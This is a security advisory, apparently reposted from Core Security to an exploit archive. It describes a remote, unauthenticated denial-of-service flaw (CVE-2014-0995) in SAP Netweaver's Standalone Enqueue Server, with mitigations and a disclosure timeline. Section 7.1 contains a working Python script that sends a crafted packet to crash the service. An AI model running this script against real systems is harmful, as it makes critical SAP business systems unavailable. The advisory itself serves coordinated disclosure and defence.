Exploit for windows platform in category dos / poc
SAP Netweaver Enqueue Server Trace Pattern Denial of Service Vulnerability
1. **Advisory Information**
Title: SAP Netweaver Enqueue Server Trace Pattern Denial of Service
Vulnerability
Advisory ID: CORE-2014-0007
Advisory URL:
http://www.coresecurity.com/advisories/sap-netweaver-enqueue-server-trace-pattern-denial-service-vulnerability
Date published: 2014-10-15
Date of last update: 2014-10-15
Vendors contacted: SAP
Release mode: Coordinated release
2. **Vulnerability Information***
*
Class: Uncontrolled Recursion [CWE-674]
Impact: Denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2014-0995
3. **Vulnerability Description**
SAP Netweaver [1] is a technology platform for building and
integrating SAP business
applications. A vulnerability has been found in SAP Netweaver
that could allow an
unauthenticated, remote attacker to create denial of service
conditions. The vulnerability
is triggered by sending a specially crafted SAP Enqueue Server
packet to remote TCP port 32NN
(NN being the SAP system number) of a host running the
"Standalone Enqueue Server" service, part
of SAP Netweaver Application Server ABAP/Java. The "Standalone
Enqueue Server" is a critical
component of a SAP Netweaver installation in terms of
availability, rendering the whole SAP
system unresponsive.
4. **Vulnerable Packages**
. SAP Netweaver 7.01 (enserver.exe version v7010.32.15.63503).
. SAP Netweaver 7.20 (enserver.exe version v7200.70.18.23869).
Other versions are probably affected too, but they were not checked.
5. **Vendor Information, Solutions and Workarounds**
Martin Gallo proposed the following actions to mitigate the
impact of the vulnerabilities:
Restrict access to the Standalone Enqueue service by configuring
Access Control Lists [4] and to
the Standalone Enqueue Service TCP port 32XX (XX is the instance
number).
SAP published a security note [3] with the fix.
6. **Credits**
This vulnerability was discovered and researched by Martin Gallo
from Core Security Consulting
Services. The publication of this advisory was coordinated by
JoaquΓn RodrΓguez Varela from Core
Advisories Team.
7. **Technical Description / Proof of Concept Code**
When the trace level of the service is configured to stop logging
when a pattern is found [2], the
service does not properly control the amount of recursion
resulting in a stack overflow exception.
The vulnerability can be triggered remotely by setting the trace
level with a wildcard Trace Pattern.
This vulnerability could allow a remote, unauthenticated attacker
to conduct a denial of service
attack against the vulnerable systems, rendering the Enqueue
Server unavailable.
The following python code can be used to trigger the vulnerability:
7.1. **Proof of Concept**
/-----
import socket, struct
from optparse import OptionParser
# Parse the target options
parser = OptionParser()
parser.add_option("-d", "--hostname", dest="hostname", help="Hostname",
default="localhost")
parser.add_option("-p", "--port", dest="port", type="int", help="Port
number", default=3200)
(options, args) = parser.parse_args()
def send_packet(sock, packet):
packet = struct.pack("!I", len(packet)) + packet
sock.send(packet)
# Connect
print "[*] Connecting to", options.hostname, "port", options.port
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((options.hostname, options.port))
print "[*] Sending crash packet"
crash = '\xab\xcd\xe1\x23' # Magic bytes
crash+= '\x00\x00\x00\x00' # Id
crash+= '\x00\x00\x00\x5b\x00\x00\x00\x5b' # Packet/frag length
crash+= '\x03\x00\x00\x00' # Destination/Opcode/MoreFrags/Type
crash+= 'ENC\x00' # Admin Eye-catcher
crash+= '\x01\x00\x00\x00' # Version
crash+= '#EAA' # Admin Eye-catcher
crash+= '\x01\x00\x00\x00\x00' # Len
crash+= '\x06\x00\x00\x00\x00\x00' # Opcode/Flags/RC
crash+= '#EAE' # Admin Eye-catcher
crash+= '\x01\x04\x00\x00' # Version/Action/Limit/Tread
crash+= '\x00\x00\x00\x00'
crash+= '\x00\x00\x00\x03\x00\x00\x00\x03' # Trace Level
crash+= '\x01' # Logging
crash+= '\x01\x40\x00\x00' # Max file size
crash+= '\x00\x00\x00\x01\x00\x00\x00\x01' # No. patterns
crash+= '\x00\x00\x00\x25#EAH' # Trace Eye-catcher
crash+= '\x01*\x00' # Trace Pattern
crash+= '#EAD' # Trace Eye-catcher
send_packet(connection, crash)
print "[*] Crash sent !"
-----/
8. **Report Timeline**
. 2014-06-02:
Initial notification sent to SAP, including technical
description to reproduce the
vulnerability. Publication date set to Jun 30, 2014.
. 2014-06-03:
Vendor notifies that the tracking number 1153917-2014 was
created for this issue.
. 2014-06-26:
Core Security requests SAP to inform the status of the advisory.
. 2014-06-30:
The vendor informs they were not able to reproduce the issue and
they request additional
details and a proof of concept.
. 2014-06-30:
Core Security sends SAP a full description of the vulnerability
including a python script
to trigger it.
. 2014-07-11:
Core Security asks if the vendor was able to trigger the
vulnerability. Additinally we
requested to set a publication date for the advisory based on
the release of a fix.
. 2014-07-14:
The vendor informs they were able to reproduce the issue but
they will not be able to provide
a timeline for the fix at the time. They inform they will work
with high priority on it and
will inform us of the planned fix release date.
. 2014-08-12:
Core Security asks if the vendor was able to develop a fix and
if they have a possible timeline
for its availability.
. 2014-08-13:
The vendor informs that the fix is undergoing quality checks.
They also inform that they can't
provide an exact date of publication yet. They also request a 3
months grace period once the
patch is available.
. 2014-08-13:
Core Security informs SAP that after we get notice that the fix
is available to the public we will
publish the advisory accordingly and will not wait for the 3
months of grace as requested because
that's not our proceeding policy.
. 2014-08-18:
The vendor informs that the fix is going to be released with the
October patch day, on Tuesday the
14th, of 2014.
. 2014-10-14:
The vendor publishes the fix under the security note 2042845.
. 2014-10-15:
Core Security releases the advisory.
9. **References**
[1] http://www.sap.com/platform/netweaver/index.epx.
[2]
http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/e929ca3d7001cee10000000a421937/content.htm?frameset=/en/47/ea3ef600e83b8be10000000a421937/frameset.htm
[3] SAP security note 2042845
[4] https://websmp230.sap-ag.de/sap/support/notes/1495075.
# 0day.today [2018-04-14] #